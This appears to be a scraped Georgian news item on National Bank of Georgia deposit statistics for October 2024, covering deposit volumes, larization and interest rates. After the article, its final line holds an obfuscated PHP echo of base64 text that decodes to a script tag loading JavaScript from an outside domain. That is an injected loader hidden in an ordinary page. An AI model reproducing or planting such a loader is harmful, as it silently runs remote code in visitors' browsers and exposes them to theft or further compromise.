celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნული ბანკის ანგარიშის მიხედვით, საბანკო სექტორში განთავსებული არასაბანკო დეპოზიტების მოცულობამ 2024 წლის ოქტომბრის ბოლოსთვის 57.23 მილიარდი ლარი შეადგინა, რაც 121.77 მილიონი ლარით, ანუ 0.21%-ით ნაკლებია წინა თვის ბოლოს არსებულ მაჩვენებელზე.

ეროვნული ბანკის ცნობით, ოქტომბერში, წინა თვესთან შედარებით, ადგილი ჰქონდა ვადიანი დეპოზიტების ზრდას 197.32 მილიონი ლარით, ანუ 0.77%-ით, ხოლო მოთხოვნამდე დეპოზიტები 319.09 მილიონი ლარით, ანუ 1.00%-ით შემცირდა.

საქართველოს ეროვნული ბანკის ინფორმაციით, დეპოზიტების ლარიზაციის კოეფიციენტმა 2024 წლის ოქტომბრის ბოლოსათვის 49.30 პროცენტი შეადგინა. წინა თვის ბოლო მდგომარეობასთან შედარებით დეპოზიტების ლარიზაცია შემცირდა 1.91 პროცენტული პუნქტით.

ამასთან, ეროვნული ბანკის მონაცემებით, ივლისში ვადიან დეპოზიტებზე საშუალო წლიურმა შეწონილმა საბაზრო საპროცენტო განაკვეთმა 6.90% შეადგინა, მათ შორის, ეროვნული ვალუტით განთავსებულ დეპოზიტებზე – 9.06%, ხოლო უცხოური ვალუტით განთავსებულ დეპოზიტებზე – 2.59%. უცხოური ვალუტით განთავსებულ დეპოზიტებში აშშ დოლარის წილმა – 78.32%, ხოლო ევროს წილმა 20.06% შეადგინა.

26
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");